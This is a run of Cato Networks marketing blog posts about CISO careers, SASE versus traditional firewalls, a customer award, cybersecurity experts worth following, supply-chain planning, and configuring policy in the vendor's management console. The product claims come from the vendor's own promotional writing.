If you’re not hitting a 50-70% interview rate on your resume, it’s time to revise your resume.But what do you change?
The Most Common Mistakes Found on CISO Resumes (Don’t Fall into a Trap)Your resume should not only highlight your technical abilities but your business acumen.Review the strategic skills highlighted earlier and emphasize those (in addition to any other relevant educational, professional, or career achievements.)
Have you briefed executives and boards?Have you given effective presentations?Have you created risk management programs and aligned the entire organization?Do you lead an online forum on Cybersecurity best practices?
Think of ways to highlight your business and leadership savvy, not just your de facto technical abilities.
The Interview Rounds
The CISO interview process is generally between 5-7 interview rounds.
Remember:The goal of your first interview is only to receive a second interview. The goal of your second interview is to receive a third interview, and so on. Be prepared for interviews with legal, finance, the CEO, CIO, HR, and more.
You’ve Got This: The Road to Landing Your First CISO Role
Abraham Lincoln once said, “the best way to predict the future is to create it.” And we hope this guide gives you a running start towards your new and exciting future as a CISO. We believe in you and your future success. Good luck! And feel free to forward this guide to a friend or colleague who’s hunting for a new CISO role, if you feel it’s been helpful.
Life After Landing the Coveted CISO Role
Congrats! You’ve Been Hired as a CISO
You did it. You’ve landed your first CISO role. We couldn’t be prouder of the hard work and dedication that it took to get you to this point. Before you begin in your new role, here are a few best practices to guide you on your way to career success.
Ensuring Your Success in the CISO Role: Things to Keep in Mind
After speaking with 1000s of CISOs since 2016, it’s important to keep the following in mind:
Your Network Security Architecture Will Determine Your Focus and Impact
No matter the organization or the scope, your CISO role is dependent on meeting if not exceeding your promised KPIs. So, you’ll need to decide, do you want a reactive or a proactive security team? Do you want your team to spend their time hunting and patching security vulnerabilities and mitigating disparate security policies? Or devoted to achieving your larger, revenue-generating missions through cybersecurity? Accordingly, you’ll need to ensure that your network security architecture minimizes your enterprise’s attack surface, so you and your team can devote your attention accordingly.
To achieve this, your team must have full visibility and control of all WAN, cloud, and internet traffic so they can work on fulfilling your business objectives through cybersecurity. Otherwise, your function will revert to tactical, instead of focusing on serving as a business enabler through cybersecurity.
Cato SSE 360 = SSE + Total Visibility and Control
Disjointed security point solutions overload resource constrained security teams, impacting security posture, and increasing overall risk due to configuration errors. Traditional SSE (Security Service Edge) convergence mitigates these challenges but offers limited visibility and control that only extends to the Internet, public cloud applications, and select internal applications. Thus, leaving WAN traffic uninspected and unoptimized. And an SSE platform that isn’t part of single-vendor SASE can’t extend convergence to SD-WAN to complete the SASE transformation journey.
Cato Networks’ SSE 360 service will allow you to solve this. SSE 360 optimizes and secures all traffic, to all WAN, cloud, and internet application resources, and across all ports and protocols. For more information about Cato’s entire suite of converged, network security, please be sure to read our SSE 360 Whitepaper. Complete with configurable security policies that meet the needs of any enterprise IS team, see why Cato SSE 360 is different from traditional SSE vendors.
The modern business looks very different from that of even a few years ago. IT technologies have changed rapidly, and corporate networks are quickly becoming...
September 8, 2022
6m read
Why Traditional NGFWs Fail to Meet Today’s Business Needs The modern business looks very different from that of even a few years ago. IT technologies have changed rapidly, and corporate networks are quickly becoming more distributed and complex. While this brings business benefits, it also creates significant challenges.
One of the biggest hurdles that companies face is ensuring that the evolution of their IT infrastructure does not outpace that of their security infrastructure. Many companies have spent significant time and resources designing and implementing security architectures around traditional next-generation firewalls (NGFWs) and other security solutions. Attempting to make evolving IT infrastructure work with these existing security deployments is a losing battle, as these solutions were designed for networks that are rapidly becoming a thing of the past.
The Modern Enterprise is Expanding
In recent years, enterprise IT infrastructures have evolved, driven by the pandemic, shifting business needs, and the introduction of new IT and security technologies. Some of the most significant recent changes in corporate IT infrastructure include:
Cloud Adoption
Nearly all companies have cloud-based infrastructure, and 89% have a multi-cloud deployment. This expansion into the cloud moves critical data and applications off-site and contributes to an increasingly distributed enterprise. Corporate WANs must be capable of efficiently and securely routing traffic between an organization’s various network segments.
Remote Work
The pandemic accelerated a transition to remote and hybrid work policies. With employees able to work from anywhere, corporate IT infrastructure must adapt to support them. Between remote work and the cloud, a growing percentage of corporate network traffic has no reason to pass through the headquarters network and its perimeter-based security solutions.
Branch Locations
In addition to the growth in remote work, companies may also be expanding to new branch locations. Like remote workers, the employees at these sites need high-performance connectivity to corporate resources hosted both in on-prem data centers and in the cloud.
Mobile Device Usage
With the growth of remote work has also come greater usage of mobile devices — both corporate and personally owned — for business purposes. Devices that may not be owned or controlled by the company may have access to sensitive corporate data or IT resources, making access management and traffic inspection critical for corporate security.
Internet of Things (IoT) Devices
IoT devices have the potential to increase an organization’s operational efficiency and ability to make data-driven decisions. However, these devices also have notoriously poor security, posing a significant threat to the security of corporate networks where they are deployed. Corporate IT architectures must be capable of limiting the risk posed by these devices, regardless of where they are deployed within the corporate WAN.
With the evolution of corporate networks, traditional LAN-focused security models are no longer effective. While protecting the corporate LAN is important, a growing percentage of an organization’s employees and devices are located outside of the traditional network perimeter. Defending cloud-based assets and remote workers with perimeter-based defenses is inefficient and hurts network performance and corporate productivity. As enterprise networks expand and grow more distributed, security architectures must be designed to protect the corporate WAN wherever it is.
Appliance-Based NGFWs Have Significant Limitations
Traditionally, most organizations have implemented perimeter-based defenses using appliance-based security solutions. If most or all of an organization’s IT infrastructure and employees are located on-site, then appliance-based security solutions can effectively meet the needs of the enterprise.
However, this description no longer fits most companies’ IT environments, making the traditional perimeter-focused and appliance-based security model a poor fit for organizations’ security needs. Some of the main limitations of appliance-based security solutions such as next-generation firewalls (NGFWs) include:
Coverage Limitations
NGFWs are designed to secure a protected network by inspecting and filtering traffic entering and leaving that network. To do so, they need to be deployed in line with all secured traffic flowing through them. This limits their effectiveness at securing the distributed enterprise as they must either be deployed at protected networks — which is increasingly unscalable with the growth of cloud deployments, remote work, and branch locations — or have all traffic rerouted to flow through them, which increases latency and harms network performance.
[boxlink link="https://catonetworks.easywebinar.live/registration-the-upside-down-world-of-networking-and-security?utm_medium=blog_top_cta&utm_campaign=upside_down_webinar"] The Upside-Down World of Networking & Security | Webinar [/boxlink]
Limited Scalability
An appliance-based NGFW is limited by its hardware and has a maximum volume and rate of traffic that it can inspect and secure. As companies increasingly adopt cloud-based infrastructure, this creates challenges as cloud resources can rapidly scale to meet increased demand. Scaling an appliance-based security solution may require acquiring and deploying additional hardware, an expensive and time-consuming process that limits corporate agility.
Complex Management and Maintenance
To be effective, security solutions such as NGFWs must be tuned to address the security concerns of their deployment environments. As companies expand to include cloud-based infrastructure, remote work, and branch locations, they may need to protect a wide range of environments. The resulting array of security solutions and custom configurations makes security management complex and unscalable.
Traditional NGFWs were designed for corporate IT environments where an organization’s assets could be protected behind a defined perimeter and used infrastructure under the organization’s control. As corporate networks evolve and these assumptions become invalid, traditional NGFWs and similar perimeter-focused and appliance-based security solutions no longer meet the needs of the modern enterprise.
Redesigning the NGFW for the Modern Business
Businesses’ digital transformation initiatives and efforts to remain competitive in a changing marketplace have driven them to adopt new technologies. Increasingly, corporate assets are hosted in the cloud, and IT architectures are distributed.
Attempting to use traditional security solutions to secure the modern enterprise forces companies to make tradeoffs between network performance and security. As IT architecture moves to the cloud and becomes distributed, NGFWs and other corporate cybersecurity solutions should follow suit.
The evolution of the corporate network has driven the development of Secure Access Service Edge (SASE) solutions, which overcome the traditional limitations of NGFWs and integrate other key network and security functions. These cloud-based solutions provide various benefits to the organization, including:
Global Reach: SASE cloud-native software is deployed in points of presence (PoPs) all over the world. This enables delivery of NGFW capabilities anywhere, minimizing the distance between on-prem, cloud-based, and remote devices and the nearest PoP. Improved Visibility: With SASE, all traffic traveling over the corporate WAN passes through at least one SASE PoP. This enables security inspection and policy enforcement and provides comprehensive visibility into corporate network traffic. Simplified Management: All SASE features are managed through a single pane of glass. This simplifies security monitoring and management, and enables unified and consistent enforcement. Security Integration: SASE PoPs consolidate numerous security and network capabilities into one coherent service, enabling greater optimization than standalone solutions. Scalable Security: SASE PoPs run cloud-native software. Scaling up to meet increasing demand happens elastically, without downtime, and without customer involvement. Enterprises no longer need to worry about mid-term hardware failure or refresh. Performance Optimization: Delivering security next to the user and the application instead of carrying user and application traffic into a central security stack reduces network latency, and improves user experience and productivity.
Cato Networks built the world’s first cloud-native, single-vendor SASE. The Cato SASE Cloud Is available from a private cloud of 75+ PoPs connected by dedicated, SLA-backed private global backbone. See the capabilities of Cato SASE Cloud for yourself by signing up for a free demo today.
Cato has received much praise and many industry awards from analysts over the years, but it’s our customers who know us the best. So, it’s...
September 6, 2022
4m read
The Gnutti Carlo Group Names Cato Networks 2021 Best Supplier in the Innovation Category Cato has received much praise and many industry awards from analysts over the years, but it's our customers who know us the best. So, it's especially gratifying to receive an award from a customer -- the 2021 Best Supplier award in the Innovation Category from global manufacturer Gnutti Carlo Group. The award recognizes the high value of the WAN connectivity and security the Cato SASE Cloud delivers in support of the Gnutti Carlo Group's digital transformation initiative.
"Thanks to the Cato platform and together with strategic services, the Gnutti Carlo Group has benefitted from a more structured, controlled, and secure ICT landscape across the entire company," says Omar Moser, Group Chief Information Officer for the Gnutti Carlo Group. (You can read more about the award here and the Gnutti Carlo Group's story here.)
Too Much Complexity!
Based in Brescia, Italy, the Gnutti Carlo Group is a leading global auto component manufacturer and partner to several OEMs active in the auto, truck, earthmoving, motorcycle, marine, generator sets, and e-mobility sectors. With annual revenues of 700 million euros and nearly 4,000 employees, the company has 16 plants in nine countries in Europe, America, and Asia.
The Group came to Cato to reign in the complexity of its network and security infrastructure built over the years from numerous mergers and acquisitions. "“Since 2000, we have started with an intensive program of internationalization, performing various acquisitions of companies of our sector and even competitors, each with different network and security architectures and policy engines,” says Moser. "It was difficult to keep policies aligned and prevent back doors and other threats."
The company had several datacenters across its locations for local services and took advantage of Microsoft Office 365, Microsoft Azure, and hosted SAP cloud services. "We had it all: public cloud, private cloud, and on-premises applications," says Moser.
Most locations were connected with IPsec VPNs, except for China, which was reached from Frankfort via a shared MPLS.
Moser realized that the only way to serve the business effectively was to centralize security and interconnection control among all locations and between plants, suppliers, and the cloud.
[boxlink link="https://www.catonetworks.com/customers/the-gnutti-carlo-group-centralizes-wan-and-security-boosts-digital-transformation-with-cato/?utm_medium=top_cta&utm_campaign=gnutti_case_study"] The Gnutti Carlo Group Centralizes WAN and Security, Boosts Digital Transformation with Cato | Customer Success Story [/boxlink]
Cato Does it All
He looked at several SD-WAN and SASE solutions, but Cato SASE was the only one that could deliver on all his requirements. "The other solutions couldn't give us a single package with integrated security, networking, and remote access," says Moser. He liked other things about the Cato solution, including its large number of globally dispersed points of presence, SASE architecture, single network and security dashboard, and forward-looking roadmap. Less tangible pluses were his great relationship with Cato and its excellent response time whenever he had any questions.
Moser entered into a three-month conditional purchase contract with Cato, after which he could close the contract if it didn't meet expectations. He connected ten plants, two service providers, 650 remote access VPN users, and Microsoft Azure via Cato and deployed Cato's SSE 360 security services across them.
A Platform for Digital Transformation
The results were so positive that he nominated Cato for the Best Supplier award. Network performance was excellent, even in China, where Moser saw a noticeable latency improvement over MPLS. Security was much improved thanks to firewall policy centralization and optimization and the ability to monitor traffic and block risky services that were previously open. "Standardizing firewall policies and knowing I can prevent intrusions and malware has allowed me to sleep a lot better," says Moser.
Best of all, Cato has enhanced the group's business agility for its digital transformation. "It is my job to be proactive and efficient," says Moser. "If we need to open a new office we can do it easily. With Cato, we have standardization, an innovative approach, and a single partner we can grow with as we transform digitally,"
Satisfying and empowering our customers are Cato's ultimate goals, which is why awards like this one from the Gnutti Carlo Group are music to our ears.
Our list of experts encompasses professionals and leaders who, together, deliver an overarching understanding of the Cybersecurity industry and the evolving nature of security threats....
September 1, 2022
7m read
15 Cybersecurity Experts To Follow on LinkedIn Our list of experts encompasses professionals and leaders who, together, deliver an overarching understanding of the Cybersecurity industry and the evolving nature of security threats. By following them, you can gain deep insights into cybersecurity’s latest developments and trends, deepen your understanding of the hacker mindset and get a glimpse into future predictions. As global cybersecurity leaders who’ve seen the dark side, they have an interesting and unique perspectives that can provide value to anyone working or interested in cybersecurity. Read on to see who the top 15 cybersecurity experts are that we recommend following on Linkedin.
1. Brian Krebs
https://www.linkedin.com/in/bkrebs/
@briankrebs
Brian is an investigative reporter and journalist who focuses his work on cybercrime and cybersecurity. He is the author of a daily blog that is hosted on his website KrebsOnSecurity.com. For 14 years, (2005 to 2019), Brian reported for The Washington Post. He also authored more than 1000 blog posts for the Security Fix blog.
The KrebsOnSecurity blog covers a wide variety of topics, from data breaches to security updates to human stories of cyber scams. They are all reported in an informative, yet personalized, manner; almost as if you were listening to a friend tell you a story. The busy comment section adds an inviting and interactive feeling.
2. Andy Greenberg
https://www.linkedin.com/in/andygreenbergjournalist/
@a_greenberg
Andy Greenberg is a cybersecurity writer for the online media outlet, WIRED, and an author. Andy’s stories cover cybersecurity, privacy, hackers and information freedom. Some of his recent articles cover the war in Ukraine, how data and organizations are hacked to seize political control and recent cyber attacks. Andy has written two books. The first, Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin's Most Dangerous Hackers, was published in 2019. The second, Tracers in the Dark: The Global Hunt for the Crime Lords of Cryptocurrency, will be released in November 2022.
3. Mikko Hypponen
https://www.linkedin.com/in/hypponen/
@mikko
The known security term "if it’s smart, it’s vulnerable” was coined by this security expert and influencer - Mikko Hypponen. Mikko is the Chief Research Officer at WithSecure and the Principal Research Advisor at F-Secure, as well as a researcher, keynote speaker, columnist and author. Mikko’s work covers global security trends and vulnerabilities, privacy and data breaches. Follow him to uncover data-driven analyses of what’s going on in privacy and security, accompanied by his take into what the future of cybersecurity holds.
4. Graham Cluley
https://www.linkedin.com/in/grahamcluley
@gcluley
Graham is a researcher, blogger, public speaker and podcaster. He talks about computer security threats and works with law enforcement agencies on hacker and cyber gang investigations. Graham’s daily blog, grahamcluley.com, focuses mainly on cyber attacks and scams. Reports are bite-sized and include concise explanations coupled with tips for readers. Graham also hosts the Smashing Security podcast, together with Carole Theriault.
[boxlink link="https://www.catonetworks.com/cybersecurity-masterclass/?utm_medium=top_cta&utm_campaign=masterclass_lobbypage"] Cybersecurity Master Class | Check it out [/boxlink]
5. Daniel Miessler
https://www.linkedin.com/in/danielmiessler/
@DanielMiessler
Head of Vulnerability Management and AppSec at Robinhood by day, security writer by night, Daniel creates and delivers security-related content on a regular basis via his website, danielmiessler.com. There, you can find blogs, tutorials and podcasts on information security, often combined with his philosophical and political views. The result is a wealth of candid information, depicting a refreshing and humanistic view of information security.
6. Ido Cohen (Darkfeed)
@ido_cohen2
If you’re looking to stay up-to-date on all things ransomware, Ido’s Twitter page is one to follow. Through quick and concise updates, Ido provides all the necessary information about recent attacks, ransomware gangs, ransomware strains and threats. While you might not get in-depth analyses or intense research reports from Ido, you will stay in the know about news, so you can pick and choose what to dig deeper into on your own time.
7. Etay Maor
https://www.linkedin.com/in/etaymaor/
An industry-recognized cybersecurity speaker and a Business Insider “IBM Rockstar Employee”, we’re proud to call Etay one of our own, as Senior Director of Security Strategy at Cato Networks. Etay is an adjunct professor at Boston College, and is part of the Call for Paper (CFP) committees for the RSA Conference and QuBits Conference. In addition to following him on LinkedIn, Etay has a dedicated Cybersecurity Masterclass series, designed to teach professionals of all levels the best practices they need to protect their enterprise. Watch his Masterclass series on everything from identifying and mitigating deepfake threats, setting up threat hunting and threat intelligence programs, and more.
8. Kevin Mitnick
https://www.linkedin.com/in/kevinmitnick/
@kevinmitnick
Convicted-hacker turned security consultant, Kevin is a valuable source of cybersecurity information, especially when it comes to social engineering and system penetration. Kevin now runs a security firm, speaks in the media at cybersecurity events and has authored a number of popular books. Follow him and his blog to (start to) understand the mindset of hackers.
9. Chuck Brooks
https://www.linkedin.com/in/chuckbrooks/
@ChuckDBrooks
Chuck is a thought leader, speaker and writer for cybersecurity who boasts multiple accolades, like “Top Person To Follow on Tech by Linkedin” and “received Presidential Appointments for Executive Service by two US Presidents”. By following him on Linkedin you will be exposed to his articles and speaking occasions, as well as his commentary on current affairs.
10. Dan Lohrmann
https://www.linkedin.com/in/danlohrmann/
@govcso
Dan is a renowned cybersecurity speaker, author and blogger, as well as an advisor for government organizations. His blog covers technological trends and global changes from a bird's eye view, while his social channel provides a newsfeed which outlines recent attacks and events from a governmental and geo-political security perspective. Together, they provide a broad overview of cybersecurity needs for the public sector.
11. Magda Chelly
https://www.linkedin.com/in/m49d4ch3lly/
@m49D4ch3lly
Dr. Magda Lilia Chelly is a cybersecurity leader, influencer and author who appears regularly in the media. She has authored three books and regularly leverages her public stance to promote social issues, like gender equality in the workplace or WLB. By following her, you’ll devour a broad range of cybersecurity topics, from remote work requirements to risk management to cybersecurity trends. Most of her thoughts and content are strategic, and can help any leader looking to design or improve their organizational security.
12. Rinki Sethi
https://www.linkedin.com/in/rinkisethi/
@rinkisethi
Rinki is the CISO at bills.com and was formerly the CISO at Twitter and the Information Security VP at IBM and Palo Alto Networks. As a security leader, she not only builds and manages cybersecurity strategies, but she also shares her thoughts and knowledge. By following her social channels, you will get access to her curated list of cybersecurity resources as well as a peek into the professional and personal life of a CISO.
13. Tyler Cohen Wood
https://www.linkedin.com/in/tylercohen78/
@TylerCohenWood
A recognized top cybersecurity influencer, Tyler is a co-founder of a cybersecurity product and a Talk Show host at My Connected Life, which discusses digital health. She is also an author, a writer and a public speaker. Tyler’s work focuses mainly on how to mitigate cyber threats in a digital world, from a unique perspective that combines both personal opinion and business requirements.
14. Bill Brenner
https://www.linkedin.com/in/billbrenner/
@BillBrenner70
Bill is an infosec expert who researches, writes and builds communities. He’s also a VP at CyberRisk Alliance. On his social channels he shares the latest updates about vulnerabilities and security controls. What’s unique about him is that he has a down-to-earth approach to cybersecurity, by understanding that security’s job is not to scare, but to provide practical and feasible assistance to CISOs.
15. Richard Bejtlich
https://www.linkedin.com/in/richardbejtlich/
@taosecurity
As a security strategist, former computer incident response team lead and martial arts student, Richard definitely knows about defense. In the past, he published a number of books as well as a blog. Today, we recommend following him on Twitter, where he shares his personal (and sometimes tongue-in-cheek commentary) on security-related current affairs.
Who Else Should We Follow?
Working in cybersecurity often feels like playing a never ending game of Whack-A-Mole. Cybersecurity experts, like those listed above, can help security experts shorten the path to determining what they should focus on strategically, which issues they should pay attention to and how to allocate their resources.Are there any other experts who help you prioritize what to work on? Share with us on Linkedin.
During an investor call in February 2022, Arista Network’s president and CEO Jayshree Ullal said that some of the lead times on its sales are...
IT Supply Chain Problems? Here’s How the Cloud Helps Get Around Them During an investor call in February 2022, Arista Network’s president and CEO Jayshree Ullal said that some of the lead times on its sales are 50-70 weeks out. Likewise, Cisco is facing extreme product delays. According to Cisco CFO Scott Heron, “The ongoing supply constraints not only impacted our ability to ship hardware, but also impacts our delivery of software such as subscriptions that customers order with the hardware. That undelivered software is also included in backlog until the hardware ships, which is when we begin to recognize the revenue.”
Arista and Cisco are not unique in their sales malaise. Gartner Principal Research Analyst Kanishka Chauhan reported the semiconductor shortage will severely disrupt the supply chain and will constrain the production of many electronic equipment types, including the networking industry.
All of which begs the question, why hasn’t Cato been impacted?
Being a cloud service obviously minimizes the effects of the log-jammed supply chain. Software keeps flowing as long as the developers keep coding. But Cato does have some hardware dependencies, most notably the Cato Socket, Cato’s edge SD-WAN device. And while the Socket is very “thin”, pushing most processing into Cato SASE PoPs, it’s still reliant on the components being impacted by today’s supply chain issues.
[boxlink link="https://www.catonetworks.com/resources/socket-short-demo/?utm_source=blog&utm_medium=top_cta&utm_campaign=cato_socket_demo"] From Legacy to SASE in under 2 minutes with Cato sockets | Watch Cato demo [/boxlink]
Immediate Action: Executive Buy-in is Critical to Addressing Supply Chain Problems
To address the problem, we protected ourselves by expanding our supply chain in a series of moves that required buy-in at the highest levels of Cato.
The first order of business was to understand what components in a Socket’s bill of materials (BOM) were at the highest risk of unavailability. The BOM is the list of materials and components required to construct a product, the Cato Socket in this case, and the specific directions needed for procuring and using the materials. In reviewing the BOM, we first identified any chipsets that had an expected delay of one year, which is highly problematic for any supplier.
Our solution was to help our Socket manufacturers source components from alternative component suppliers. Being a cloud service, Cato could be very flexible in the terms and conditions we gave to our manufacturers, enabling them to source components from suppliers with whom normally they might not have been able to negotiate profitable terms. (All suppliers are trusted and certified to ensure quality standards are met.)
The second action we took was in logistics. We changed how we transported goods from the manufacturer in Taiwan to strategic distribution centers around the world. Like most vendors, we normally ship components by sea, which is the most economical approach, but also takes the most time. Instead, we began shipping products by air, eliminating the lengthy sea travel time and long delays at backed-up seaports.
Long Term Action: Increasing Component Supplies Prevents Impact of Forecasted Shortages
Recognizing that there’s no quick fix to the component shortage, we took steps to manage the situation over the long term. We decided to increase our production orders with our manufacturer to cover forecasts at least through the next two years. By making this early commitment, the manufacturer could plan for the necessary components and begin stocking them now. We also communicate regularly with the manufacturer to monitor problem areas in acquiring components.
Next, Cato is considering having our Socket manufacturer build “problematic kits” of the major at-risk components. A kit consists of the Socket components with the longest lead times. Cato is willing to commit to purchasing thousands of kits to have on hand. A kit is a fraction of the cost of a complete Socket since it’s just a bunch of parts. It’s worth acquiring these components and stockpiling them as they become available to reduce the lead time of buying them when they are needed. Once again, this increases our agility and reduces our long-term risk.
To better prepare for the future, Cato is testing alternative components to the parts of the current Socket that are problematic to source. A replacement part may have the same delivery issues but it’s still worth having options to give us flexibility. If we choose alternative components, they will be certified by both the manufacturer and Cato to ensure they meet our performance standards.
In addition, Cato continually evaluates new manufacturers for multisourcing Socket production. By not relying on any one platform or company, Cato ensures a continuous flow of products.
The Cloud: Cato’s Key Advantage in Weathering the Supply Chain Dilemmas
Being a cloud-first company affords Cato great flexibility in weathering supply chain shortages and disruptions. Through some planning and a bit of ingenuity, we’ve been able to ensure continued component and product availability for the foreseeable future.
I love Trombones… in marching bands. Some trombones, however, generate a totally different sound: sighs of angst across networking teams around the world. Why “The...
The Sound of the Trombone I love Trombones… in marching bands. Some trombones, however, generate a totally different sound: sighs of angst across networking teams around the world.
Why “The Trombone Effect” Is So Detrimental to IT Teams and End Users
The “Trombone Effect” occurs in a network architecture that forces a distributed organization to use a single secure exit point to the Internet. Simply put, network traffic from remote locations and mobile users is being backhauled to the corporate datacenter where it exits to the Internet through the corporate’s security appliances stack. Network responses then flow back through the same stack and travel from the data center to the remote user.
This twisted path, resembling the bent pipes of a trombone, has a negative impact on latency and therefore on the user experience. Why does this compromise exist? If you are in a remote office, your organization may not be able to afford a stack of security appliances (firewall, secure web gateway or SWG, etc.) in your office. Affordability is not just a matter of money. Distributed appliances have policies that need to be managed and if the appliance fails or requires maintenance – someone has to take care of it at that remote location. Mobile users are left unprotected because they are not “behind” the corporate network security stack.
[boxlink link="https://www.catonetworks.com/resources/cato-sse-360-finally-sse-with-total-visibility-and-control/?utm_source=blog&utm_medium=top_cta&utm_campaign=cato_sse_360"] Cato SSE 360: Finally, SSE with Total Visibility and Control | Whitepaper [/boxlink]
Do Regional Hubs Mitigate the Impact of “Trombone Effect?”
The most recent answer to the Trombone Effect is the use of “regional hubs”. These “mini” data centers host the security stack and shorten the distance between remote locations and security exit points to the internet. This approach reduces the end user performance impact, by backhauling to the nearest hub. However, the fundamental issue of managing multiple instances of the security stack remains as well as the need to set up distributed datacenters and address performance and availability requirements.
Solving the “Trombone Effect” with Cato SSE 360
Cato Networks solves the “Trombone Effect” with Cato’s Security Service Edge 360 (SSE 360), which ensures that security is available everywhere that users, applications, and data reside. Rather than making security available in just a few places,
Threat prevention and data protection are uniformly enforced via our private backbone spanning over 75+ PoPs supporting customers in 150+ countries. Because the PoPs reside within 25 ms of all users and locations, companies don’t need to set up regional hubs to secure the traffic, alleviating the cost, complexity and responsibility for capacity planning and management, while ensuring optimal security posture without compromising the user experience.
Next Steps: Get Clear on Cato SSE 360
If you are a victim of the “Trombone Effect,” then Cato Networks can easily solve this with SSE 360. Visit our Cato SSE 360 product page, to learn about our architecture, capabilities, benefits, and use cases, and receive a thorough overview of our service offering.
Since the inception of SASE, there’s been a remarkable amount of breast-beating over the number of features offered by SASE solutions. That is a mistake....
Inside SASE: GigaOm Review of 20 Vendors Finds Platforms Are Far and Few Since the inception of SASE, there’s been a remarkable amount of breast-beating over the number of features offered by SASE solutions.
That is a mistake.
SASE innovation has always been about the convergence of security and networking capabilities into a cloud service. The core capabilities of SASE are not new. Their convergence in appliances isn’t new either; that’s what we call UTMs. It’s the delivery as a secure networking global cloud service that is so revolutionary. Only with one cloud service connecting and securing the entire enterprise – remote users sites, and cloud resources – worldwide can enterprises realize the cost savings, increased agility, operational simplicity, deeper security insight and more promised by SASE.
Too often, though, media and analyst communities miss the essential importance of a converged cloud platform. You’ll read about vendor market share without consideration if the vendor is delivering a converged solution or if it’s just their old appliances marketed under the SASE brand. You’ll see extensive features tables but very little about whether those capabilities exist in one software stack, managed through one interface – the hallmarks of a platform.
GigaOm’s Radar Report Accurately Captures State of SASE Platform Convergence
Which is why I found GigaOm’s recent Radar Report on the Secure Service Access (SSA) market so significant. It is one of the few reports to accurately measure the “platform-ness” of SASE/SSA/SSE solutions. SSA is GigaOm’s terms for the security models being promoted as SSE, SASE, ZTNA, and XDR along with networking capabilities, such as optimized routing and SD-WAN. The report assesses more than 20 vendor solutions, providing detailed writeups and recommendations for each. (Click here to download and read the report.)
[boxlink link="https://www.catonetworks.com/resources/gigaoms-evaluation-guide-for-technology-decision-makers/?utm_source=blog&utm_medium=top_cta&utm_campaign=gigaom_report"] GigaOm’s Evaluation Guide for Technology Decision Makers | Report [/boxlink]
Those hundreds of data points are then collapsed into the GigaOm Radar that provides a forward-looking perspective of the vendor offerings. GigaOm plots vendor solutions across a series of concentric rings, with those set closer to the center judged to be of higher overall value. Vendors are characterized based on their degree of convergence into a platform (feature vs. platform play) and their robustness (maturity vs. innovation). The length of the arrow indicates the predicted evolution over the coming 12-18 month:
The GigaOm Radar for SSA found Cato and Zscaler to be the only Leaders who were outperforming the market.
The Findings: Platform Convergence is Not a Given in the SASE Market
The report found Cato SASE Cloud to be one of the few SSA platforms capable of addressing the networking and security needs for large enterprises, MSPs, and SMEs.
The Cato SASE Cloud provides outstanding enterprise-grade network performance and predictability worldwide by connecting sites, remote users, and cloud resources across the optimized Cato Global Private Backbone. Once connected, the Cato SSE 360 pillar of Cato SASE Cloud enforces granular corporate access policies on all applications -- on-premises and in the cloud – and across all ports and protocols, protecting users against threats, and preventing sensitive data loss.
Of GigaOm’s key SSA Criteria, the Cato SASE Cloud was the only Leader to be ranked “Exceptional” in seven of eight categories:
Defense in Depth Identity-Based Access Dynamic Segmentation Unified Threat Management ML-Powered SecurityAutonomous Network Security Integrated Solution
And the company found a similarly near-perfect score when it came to the core networking and network-based security capabilities comprising SSA solutions: SD-WAN, FWaaS, SWG, CASB, ZTNA, and NDR.
“Founded in 2015, Cato Networks was one of the first vendors to launch a global cloud-native service converging SD-WAN and security as a service,” says the report. “Developed in-house from the ground up, Cato SASE Cloud connects all enterprise network resources—including branch locations, cloud and physical data centers, and the hybrid workforce—within a secure, cloud-native service. Delivering low latency and predictable performance via a global private backbone”
To learn more, download the report.
In this article, we will discuss some of the various policy objects that exist within the Cato Management Application and how they are used. You...
Cato SASE Cloud: Enjoy Simplified Configuration and Centralized, Global Policy Delivery In this article, we will discuss some of the various policy objects that exist within the Cato Management Application and how they are used. You may be familiar with the concept of localized versus centralized policies that exist within legacy SD-WAN architectures, but Cato’s cloud-native SASE architecture simplifies configuration and policy delivery across all capabilities from a true single management application.
Understanding Cato’s Management Application from Its Architecture
To understand policy design within the Cato Management application, it’s useful to discuss some of Cato’s architecture. Cato’s cloud was built from the ground up to provide converged networking and security globally. Because of this convergence, automated security engines and customized policies benefit from shared context and visibility allowing true single-pass processing and more accurate security verdicts.
Each piece of context can typically be used for policy matching across both networking and security capabilities within Cato’s SASE Cloud. This includes elements like IP address, subnet, username, group membership, hostname, remote user, site, and more. Additionally, policy rules can be further refined based on application context including application (custom applications too), application categories, service, port range, domain name, and more. All created rules apply based on the first match in the rule list from the top down.
[boxlink link="https://www.catonetworks.com/resources/cato-sse-360-finally-sse-with-total-visibility-and-control/?utm_source=blog&utm_medium=top_cta&utm_campaign=cato_sse_360"] Cato SSE 360: Finally, SSE with Total Visibility and Control | Whitepaper [/boxlink]
A Close Look at Cato’s Networking Policy
Cato’s SASE Cloud is comprised of over 75 (and growing) top-tier data center locations, each connected with multiple tier 1 ISP connections forming Cato’s global private backbone. Cato automatically chooses the best route for your traffic dynamically, resulting in a predictable and reliable connection to resources compared with public Internet. Included features like QoS, TCP Acceleration, and Packet Loss Mitigation allow customers to fine-tune performance to their needs.
1. Cato Network Rules are pre-defined to meet common use-cases. They can be easily customized or create your own rules based on context type.
By default, the Cato Management Application has several pre-defined network rules and bandwidth priority levels to meet the most common use cases, but customers can quickly customize these policies or create their own rules based on the context types mentioned above. Customers can control the use of TCP acceleration and Packet Loss Mitigation and assign a bandwidth priority level to the traffic. Additionally, traffic routing across Cato’s backbone is fully under the customer’s control, allowing egressing from any of our PoPs to get as close to the destination as possible. You can even egress traffic from an IP address that is dedicated to your organization, all without opening a support ticket.
2. Bandwidth Priorities: With Cato, it’s easy to assign a bandwidth priority level to the traffic.
Cato’s Security Policies Share a Similar, Top-Down Logic
Cato’s security policies follow the same top-down logic and benefit from the same shared context as the network policy.
3. Internet Firewall Rules enforce company-driven access policies to Internet websites and apps based on app name, category, port, protocol and service.
The Internet Firewall utilizes a block-list approach and is intended to enforce company-driven access policies to Internet websites and applications based on the application name, application category, port, protocol, and service. Unlike legacy security products, customers do not have to manage and attach multiple security profiles to their rules. All security engines (IPS, Anti-Malware, Next-Generation Anti-Malware) are enabled globally and scan all ports and protocols with exceptions created only when needed. This provides a consistent security posture for all users, locations, and devices without the pitfalls and misconfigurations of multiple security profiles.
4. Cato’s WAN Firewall provides granular control of traffic between all connected edges.
